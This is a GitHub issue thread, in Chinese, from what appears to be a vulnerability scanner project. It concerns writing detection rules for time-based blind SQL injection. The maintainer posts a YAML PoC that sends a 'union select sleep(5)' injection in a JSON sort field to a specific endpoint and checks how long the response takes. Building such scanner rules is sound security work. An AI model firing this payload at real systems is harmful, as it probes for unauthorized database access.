Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

请问关于时间盲注的响应匹配规则要怎么写 #370

Open
Awrrays opened this issue Aug 23, 2024 · 4 comments
Open

请问关于时间盲注的响应匹配规则要怎么写 #370

Awrrays opened this issue Aug 23, 2024 · 4 comments

Comments

@Awrrays
Copy link

Awrrays commented Aug 23, 2024

No description provided.

@chz2008
Copy link

chz2008 commented Aug 29, 2024

同样,跟你遇到一样的困惑了,希望作者能考虑一下

@shadow1ng
Copy link
Owner

Poc目录里搜索 sleep有例子。

name: riskscanner-list-sqli
rules:
  - method: POST
    path: /resource/list/1/10
    headers:
      Content-Type: application/json;charset=UTF-8
    body: "\
    {\"sort\":\"1)a union select sleep(5) -- -\"}\r\n\
    "
    expression: |
      response.status == 200 &&  response.duration >= 5.0

@chz2008
Copy link

chz2008 commented Aug 29, 2024

图片
更改了 虽然加载的时候不报错,但是检测不出来(注:测试的poc和目标都没问题)

@chz2008 chz2008 mentioned this issue Aug 29, 2024
Open
@shadow1ng
Copy link
Owner

我回头看看把

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@shadow1ng @chz2008 @Awrrays